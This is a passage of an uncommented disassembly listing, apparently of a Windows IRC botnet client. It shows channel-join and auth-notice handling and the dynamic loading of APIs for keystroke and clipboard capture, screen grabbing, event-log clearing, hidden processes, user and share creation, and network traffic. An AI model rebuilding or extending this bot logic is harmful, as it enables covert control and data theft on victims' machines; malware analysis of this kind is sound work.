loc_4096F2: ; CODE XREF: sub_401ACD+7C41�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax]
call sub_40B713
pop ecx
test eax, eax
pop ecx
jnz short loc_409752
add [ebp+arg_24], 4
cmp [ebp+arg_24], offset off_429160
jb short loc_4096F2
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 14h
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
push edi
push esi
push offset unk_429B74
jmp loc_4023EE
; ---------------------------------------------------------------------------
loc_409752: ; CODE XREF: sub_401ACD+7C34�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409757: ; CODE XREF: sub_401ACD+7CB4�j
cmp [ebp+arg_20], ebx
jz loc_401F75
cmp [edi], bl
jnz short loc_409777
push [ebp+arg_20]
push offset aCool ; "cool"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_409788
loc_409777: ; CODE XREF: sub_401ACD+7C95�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_409757
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_409788: ; CODE XREF: sub_401ACD+7CA8�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_E04]
push 7Fh
push eax
push esi
call sub_41BFD0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4097BF
push ebx
push [ebp+var_4]
push offset unk_429B54
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_4097BF: ; CODE XREF: sub_401ACD+7CD6�j
lea eax, [ebp+var_C4]
push eax
push offset unk_429B34
loc_4097CB: ; CODE XREF: sub_401ACD+595�j
; sub_401ACD+2889�j ...
call sub_415DAC
loc_4097D0: ; CODE XREF: sub_401ACD+1B81�j
pop ecx
loc_4097D1: ; CODE XREF: sub_401ACD+24FD�j
pop ecx
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_4097D7: ; CODE XREF: sub_401ACD+20E�j
; sub_401ACD+223�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
push offset aXI ; "-x+i"
push [ebp+arg_10]
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 10h
mov dword_4CB884, edi
jmp loc_401D6A
sub_401ACD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409823 proc near ; CODE XREF: sub_401955:loc_401992�p
; sub_401ACD+1CB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_41CB70
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
leave
retn
sub_409823 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409869 proc near ; CODE XREF: sub_401ACD+506�p
; sub_401ACD+134E�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_409884
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_409884: ; CODE XREF: sub_409869+14�j
push edi
call sub_41B9C0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_41B9C0
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_8 ; "%s"
push esi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset aSSS_1 ; "%s %s :%s\r\n"
push eax
call sub_41C266
add esp, 14h
lea eax, [ebp+var_200]
push 0
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_409907
push 7D0h
call ds:dword_427080 ; Sleep
locret_409907: ; CODE XREF: sub_409869+91�j
leave
retn
sub_409869 endp
; =============== S U B R O U T I N E =======================================
sub_409909 proc near ; CODE XREF: sub_401221+4B�p
push ebx
push ebp
mov ebp, ds:dword_4270A4
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_4270C4
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_409A29
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4CBA80, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4CB9F4, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4CB9D8, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4CB8E8, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4CB894, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4CB8C4, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4CB93C, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_4CBA34, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4CBA90, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4CB8F4, eax
call esi ; GetProcAddress
cmp dword_4CBA80, ebx
mov dword_4CB8DC, eax
jz short loc_409A07
cmp dword_4CB9F4, ebx
jz short loc_409A07
cmp dword_4CB9D8, ebx
jz short loc_409A07
cmp dword_4CB8E8, ebx
jz short loc_409A07
cmp dword_4CB8C4, ebx
jz short loc_409A07
cmp dword_4CB93C, ebx
jz short loc_409A07
cmp dword_4CBA34, ebx
jz short loc_409A07
cmp dword_4CBA90, ebx
jz short loc_409A07
cmp dword_4CB8F4, ebx
jz short loc_409A07
cmp eax, ebx
jnz short loc_409A11
loc_409A07: ; CODE XREF: sub_409909+B8�j
; sub_409909+C0�j ...
mov dword_4CBA94, 1
loc_409A11: ; CODE XREF: sub_409909+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4CBA0C, eax
jz short loc_409A3E
push 1
push ebx
call eax
jmp short loc_409A3E
; ---------------------------------------------------------------------------
loc_409A29: ; CODE XREF: sub_409909+1D�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBA98, eax
mov dword_4CBA94, 1
loc_409A3E: ; CODE XREF: sub_409909+117�j
; sub_409909+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_4270C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_409B53
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4CBA30, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_4CB9E0, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_4CB974, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4CBA84, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_4CB9A4, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4CB9C4, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_4CBA28, eax
call esi ; GetProcAddress
cmp dword_4CBA30, ebx
mov dword_4CB914, eax
jz short loc_409AF7
cmp dword_4CB9E0, ebx
jz short loc_409AF7
cmp dword_4CB974, ebx
jz short loc_409AF7
cmp dword_4CBA84, ebx
jz short loc_409AF7
cmp dword_4CB9A4, ebx
jz short loc_409AF7
cmp dword_4CB9C4, ebx
jz short loc_409AF7
cmp dword_4CBA28, ebx
jz short loc_409AF7
cmp eax, ebx
jnz short loc_409B01
loc_409AF7: ; CODE XREF: sub_409909+1B8�j
; sub_409909+1C0�j ...
mov dword_4CBA9C, 1
loc_409B01: ; CODE XREF: sub_409909+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_4CB9A0, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_4CB8A8, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_4CB970, eax
call esi ; GetProcAddress
cmp dword_4CB9A0, ebx
mov dword_4CB958, eax
jz short loc_409B5E
cmp dword_4CB8A8, ebx
jz short loc_409B5E
cmp dword_4CB970, ebx
jz short loc_409B5E
cmp eax, ebx
jnz short loc_409B68
jmp short loc_409B5E
; ---------------------------------------------------------------------------
loc_409B53: ; CODE XREF: sub_409909+144�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAA0, eax
loc_409B5E: ; CODE XREF: sub_409909+232�j
; sub_409909+23A�j ...
mov dword_4CBA9C, 1
loc_409B68: ; CODE XREF: sub_409909+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_409D21
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4CBA44, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4CB988, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4CB9F8, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4CB8D4, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4CB938, eax
call esi ; GetProcAddress
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_4CB9B0, eax
call esi ; GetProcAddress
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov dword_4CB954, eax
call esi ; GetProcAddress
cmp dword_4CBA44, ebx
mov dword_4CB964, eax
jz short loc_409C11
cmp dword_4CB988, ebx
jz short loc_409C11
cmp dword_4CB9F8, ebx
jz short loc_409C11
cmp dword_4CB8D4, ebx
jz short loc_409C11
cmp dword_4CB938, ebx
jz short loc_409C11
cmp dword_4CB9B0, ebx
jnz short loc_409C1B
loc_409C11: ; CODE XREF: sub_409909+2DE�j
; sub_409909+2E6�j ...
mov dword_4CBAA4, 1
loc_409C1B: ; CODE XREF: sub_409909+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4CB9B8, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4CB990, eax
call esi ; GetProcAddress
cmp dword_4CB9B8, ebx
mov dword_4CBA40, eax
jz short loc_409C56
cmp dword_4CB990, ebx
jz short loc_409C56
cmp eax, ebx
jnz short loc_409C60
loc_409C56: ; CODE XREF: sub_409909+33F�j
; sub_409909+347�j
mov dword_4CBAA4, 1
loc_409C60: ; CODE XREF: sub_409909+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4CB9C8, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4CB8B0, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4CB8B8, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4CB91C, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4CB920, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4CB8CC, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4CB994, eax
call esi ; GetProcAddress
cmp dword_4CB9C8, ebx
mov dword_4CB8BC, eax
jz short loc_409D04
cmp dword_4CB8B0, ebx
jz short loc_409D04
cmp dword_4CB8B8, ebx
jz short loc_409D04
cmp dword_4CB91C, ebx
jz short loc_409D04
cmp dword_4CB920, ebx
jz short loc_409D04
cmp dword_4CB8CC, ebx
jz short loc_409D04
cmp dword_4CB994, ebx
jz short loc_409D04
cmp eax, ebx
jnz short loc_409D0E
loc_409D04: ; CODE XREF: sub_409909+3C5�j
; sub_409909+3CD�j ...
mov dword_4CBAA4, 1
loc_409D0E: ; CODE XREF: sub_409909+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4CB8B4, eax
jnz short loc_409D36
jmp short loc_409D2C
; ---------------------------------------------------------------------------
loc_409D21: ; CODE XREF: sub_409909+26A�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAA8, eax
loc_409D2C: ; CODE XREF: sub_409909+416�j
mov dword_4CBAA4, 1
loc_409D36: ; CODE XREF: sub_409909+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_409E02
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4CB9C0, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4CBA18, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_4CBA20, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_4CB9DC, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4CB8F8, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_4CB8A4, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_4CBA1C, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4CB890, eax
call esi ; GetProcAddress
cmp dword_4CB9C0, ebx
mov dword_4CB930, eax
jz short loc_409E0D
cmp dword_4CBA18, ebx
jz short loc_409E0D
cmp dword_4CBA20, ebx
jz short loc_409E0D
cmp dword_4CB9DC, ebx
jz short loc_409E0D
cmp dword_4CB8F8, ebx
jz short loc_409E0D
cmp dword_4CB8A4, ebx
jz short loc_409E0D
cmp dword_4CBA1C, ebx
jz short loc_409E0D
cmp dword_4CB890, ebx
jz short loc_409E0D
cmp eax, ebx
jnz short loc_409E17
jmp short loc_409E0D
; ---------------------------------------------------------------------------
loc_409E02: ; CODE XREF: sub_409909+438�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAB0, eax
loc_409E0D: ; CODE XREF: sub_409909+4B9�j
; sub_409909+4C1�j ...
mov dword_4CBAAC, 1
loc_409E17: ; CODE XREF: sub_409909+4F5�j
mov ebp, ds:dword_4270C0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A0D3
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4CB944, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_4CBA78, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_4CB8E4, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4CB8C0, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4CB980, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4CB968, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4CB92C, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4CBA54, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_4CBA70, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4CB97C, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_4CBA60, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_4CBA14, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4CB9D4, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4CB9D0, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4CB904, eax
call esi ; GetProcAddress
push offset aSend_0 ; "send"
push edi
mov dword_4CB8FC, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_4CBA24, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4CBA38, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_4CB9EC, eax
call esi ; GetProcAddress
mov dword_4CB9AC, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4CBA00, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4CB9BC, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4CB9FC, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4CBA68, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_4CB9B4, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_4CB978, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4CB9E8, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_4CBA58, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4CB98C, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4CB928, eax
call esi ; GetProcAddress
cmp dword_4CB944, ebx
mov dword_4CBA6C, eax
jz loc_40A0DE
cmp dword_4CBA78, ebx
jz loc_40A0DE
cmp dword_4CB8E4, ebx
jz loc_40A0DE
cmp dword_4CB980, ebx
jz loc_40A0DE
cmp dword_4CB968, ebx
jz loc_40A0DE
cmp dword_4CB92C, ebx
jz loc_40A0DE
cmp dword_4CBA54, ebx
jz loc_40A0DE
cmp dword_4CBA70, ebx
jz loc_40A0DE
cmp dword_4CB97C, ebx
jz loc_40A0DE
cmp dword_4CBA60, ebx
jz loc_40A0DE
cmp dword_4CBA14, ebx
jz loc_40A0DE
cmp dword_4CB9D4, ebx
jz loc_40A0DE
cmp dword_4CB9D0, ebx
jz loc_40A0DE
cmp dword_4CB904, ebx
jz short loc_40A0DE
cmp dword_4CBA24, ebx
jz short loc_40A0DE
cmp dword_4CBA38, ebx
jz short loc_40A0DE
cmp dword_4CB9EC, ebx
jz short loc_40A0DE
cmp dword_4CB9AC, ebx
jz short loc_40A0DE
cmp dword_4CBA00, ebx
jz short loc_40A0DE
cmp dword_4CB9BC, ebx
jz short loc_40A0DE
cmp dword_4CB9FC, ebx
jz short loc_40A0DE
cmp dword_4CBA68, ebx
jz short loc_40A0DE
cmp dword_4CB9B4, ebx
jz short loc_40A0DE
cmp dword_4CB978, ebx
jz short loc_40A0DE
cmp dword_4CB9E8, ebx
jz short loc_40A0DE
cmp dword_4CBA58, ebx
jz short loc_40A0DE
cmp dword_4CB98C, ebx
jz short loc_40A0DE
cmp eax, ebx
jnz short loc_40A0E8
jmp short loc_40A0DE
; ---------------------------------------------------------------------------
loc_40A0D3: ; CODE XREF: sub_409909+51F�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAB8, eax
loc_40A0DE: ; CODE XREF: sub_409909+6BE�j
; sub_409909+6CA�j ...
mov dword_4CBAB4, 1
loc_40A0E8: ; CODE XREF: sub_409909+7C6�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A1ED
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_4CB910, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4CB898, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4CB99C, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4CB948, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4CB9A8, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_4CB96C, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4CB8D8, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_4CB8D0, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4CB8E0, eax
call esi ; GetProcAddress
cmp dword_4CB910, ebx
mov ecx, dword_4CB96C
mov dword_4CBA08, eax
jz short loc_40A1C9
cmp dword_4CB898, ebx
jz short loc_40A1C9
cmp dword_4CB99C, ebx
jz short loc_40A1C9
cmp dword_4CB948, ebx
jz short loc_40A1C9
cmp dword_4CB9A8, ebx
jz short loc_40A1C9
cmp ecx, ebx
jz short loc_40A1C9
cmp dword_4CB8D8, ebx
jz short loc_40A1C9
cmp dword_4CB8D0, ebx
jz short loc_40A1C9
cmp dword_4CB8E0, ebx
jz short loc_40A1C9
cmp eax, ebx
jnz short loc_40A1D3
loc_40A1C9: ; CODE XREF: sub_409909+87E�j
; sub_409909+886�j ...
mov dword_4CBABC, 1
loc_40A1D3: ; CODE XREF: sub_409909+8BE�j
cmp ecx, ebx
jz short loc_40A208
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_4CB984, eax
jnz short loc_40A208
jmp short loc_40A202
; ---------------------------------------------------------------------------
loc_40A1ED: ; CODE XREF: sub_409909+7EA�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAC0, eax
mov dword_4CBABC, 1
loc_40A202: ; CODE XREF: sub_409909+8E2�j
mov dword_4CB984, ebx
loc_40A208: ; CODE XREF: sub_409909+8CC�j
; sub_409909+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A252
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4CB95C, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_4CBA8C, eax
call esi ; GetProcAddress
cmp dword_4CB95C, ebx
mov dword_4CB8EC, eax
jz short loc_40A25D
cmp dword_4CBA8C, ebx
jz short loc_40A25D
cmp eax, ebx
jnz short loc_40A267
jmp short loc_40A25D
; ---------------------------------------------------------------------------
loc_40A252: ; CODE XREF: sub_409909+90A�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAC8, eax
loc_40A25D: ; CODE XREF: sub_409909+939�j
; sub_409909+941�j ...
mov dword_4CBAC4, 1
loc_40A267: ; CODE XREF: sub_409909+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A36E
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4CB8C8, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4CB8A0, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4CB918, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4CB94C, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4CBA64, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_4CB900, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4CB8AC, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4CB89C, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4CB934, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4CBA2C, eax
call esi ; GetProcAddress
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov dword_4CB9E4, eax
call esi ; GetProcAddress
cmp dword_4CB8C8, ebx
mov dword_4CB908, eax
jz short loc_40A379
cmp dword_4CB8A0, ebx
jz short loc_40A379
cmp dword_4CB918, ebx
jz short loc_40A379
cmp dword_4CB94C, ebx
jz short loc_40A379
cmp dword_4CBA64, ebx
jz short loc_40A379
cmp dword_4CB900, ebx
jz short loc_40A379
cmp dword_4CB8AC, ebx
jz short loc_40A379
cmp dword_4CB89C, ebx
jz short loc_40A379
cmp dword_4CB934, ebx
jz short loc_40A379
cmp dword_4CBA2C, ebx
jz short loc_40A379
cmp dword_4CB9E4, ebx
jnz short loc_40A383
jmp short loc_40A379
; ---------------------------------------------------------------------------
loc_40A36E: ; CODE XREF: sub_409909+969�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAD0, eax
loc_40A379: ; CODE XREF: sub_409909+A11�j
; sub_409909+A19�j ...
mov dword_4CBACC, 1
loc_40A383: ; CODE XREF: sub_409909+A61�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A3B8
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4CB8F0, eax
call esi ; GetProcAddress
cmp dword_4CB8F0, ebx
mov dword_4CB9CC, eax
jz short loc_40A3C3
cmp eax, ebx
jnz short loc_40A3CD
jmp short loc_40A3C3
; ---------------------------------------------------------------------------
loc_40A3B8: ; CODE XREF: sub_409909+A85�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAD8, eax
loc_40A3C3: ; CODE XREF: sub_409909+AA7�j
; sub_409909+AAD�j
mov dword_4CBAD4, 1
loc_40A3CD: ; CODE XREF: sub_409909+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A402
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4CBA50, eax
call esi ; GetProcAddress
cmp dword_4CBA50, ebx
mov dword_4CBA4C, eax
jz short loc_40A40D
cmp eax, ebx
jnz short loc_40A417
jmp short loc_40A40D
; ---------------------------------------------------------------------------
loc_40A402: ; CODE XREF: sub_409909+ACF�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAE0, eax
loc_40A40D: ; CODE XREF: sub_409909+AF1�j
; sub_409909+AF7�j
mov dword_4CBADC, 1
loc_40A417: ; CODE XREF: sub_409909+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A476
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4CBA7C, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4CBA74, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4CBA3C, eax
call esi ; GetProcAddress
cmp dword_4CBA7C, ebx
mov dword_4CB90C, eax
jz short loc_40A481
cmp dword_4CBA74, ebx
jz short loc_40A481
cmp dword_4CBA3C, ebx
jz short loc_40A481
cmp eax, ebx
jnz short loc_40A48B
